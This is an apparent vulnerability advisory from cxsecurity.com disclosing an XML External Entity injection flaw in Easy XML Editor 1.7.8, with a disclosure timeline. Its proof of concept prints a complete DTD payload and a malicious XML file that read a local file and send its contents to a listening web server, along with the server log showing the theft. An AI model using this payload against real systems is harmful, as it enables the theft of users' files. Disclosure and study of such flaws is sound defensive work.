Easy XML Editor 1.7.8 XML Injection

2020.01.21
Credit: Javier Olmedo
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

# Exploit Title: Easy XML Editor 1.7.8 - XML External Entity Injection # Exploit Author: Javier Olmedo # Date: 2018-11-21 # Vendor: Richard Wuerflein # Software Link: https://www.edit-xml.com/Easy_XML_Editor.exe # Affected Version: 1.7.8 and before # Patched Version: unpatched # Category: Local # Platform: XML # Tested on: Windows 10 Pro # CWE: https://cwe.mitre.org/data/definitions/611.html # CVE: 2019-19031 # References: # https://hackpuntes.com/cve-2019-19031-easy-xml-editor-1-7-8-inyeccion-xml/ # 1. Technical Description # Easy XML Editor version 1.7.8 and before are affected by XML External Entity Injection vulnerability # through the malicious XML file. This allows a malicious user to read arbitrary files. # 2. Proof Of Concept (PoC) # 2.1 Start a webserver to receive the connection. python -m SimpleHTTPServer 80 # 2.2 Upload the payload.dtd file to your web server. <?xml version="1.0" encoding="UTF-8"?> <!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:80/?%file;'>"> %all; # 2.3 Create a SECRET.TXT file with any content in desktop. # 2.4 Open poc.xml <?xml version="1.0"?> <!DOCTYPE test [ <!ENTITY % file SYSTEM "file:///C:\Users\<USER>\Desktop\secret.txt"> <!ENTITY % dtd SYSTEM "http://localhost:80/payload.dtd"> %dtd;]> <pwn>&send;</pwn> # 2.5 Your web server will receive a request with the contents of the secret.txt file Serving HTTP on 0.0.0.0 port 8000 ... 192.168.100.23 - - [11/Nov/2019 08:23:52] "GET /payload.dtd HTTP/1.1" 200 - 192.168.100.23 - - [11/Nov/2019 08:23:52] "GET /?THIS%20IS%20A%20SECRET%20FILE HTTP/1.1" 200 - # 3. Timeline # 13, november 2019 - [RESEARCHER] Discover # 13, november 2019 - [RESEARCHER] Report to vendor support # 14, november 2019 - [DEVELOPER] Unrecognized vulnerability # 15, november 2019 - [RESEARCHER] Detailed vulnerability report # 22, november 2019 - [RESEARCHER] Public disclosure # 4. Disclaimer # The information contained in this notice is provided without any guarantee of use or otherwise. # The redistribution of this notice is explicitly permitted for insertion into vulnerability # databases, provided that it is not modified and due credit is granted to the author. # The author prohibits the malicious use of the information contained herein and accepts no responsibility. # All content (c) # Javier Olmedo


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top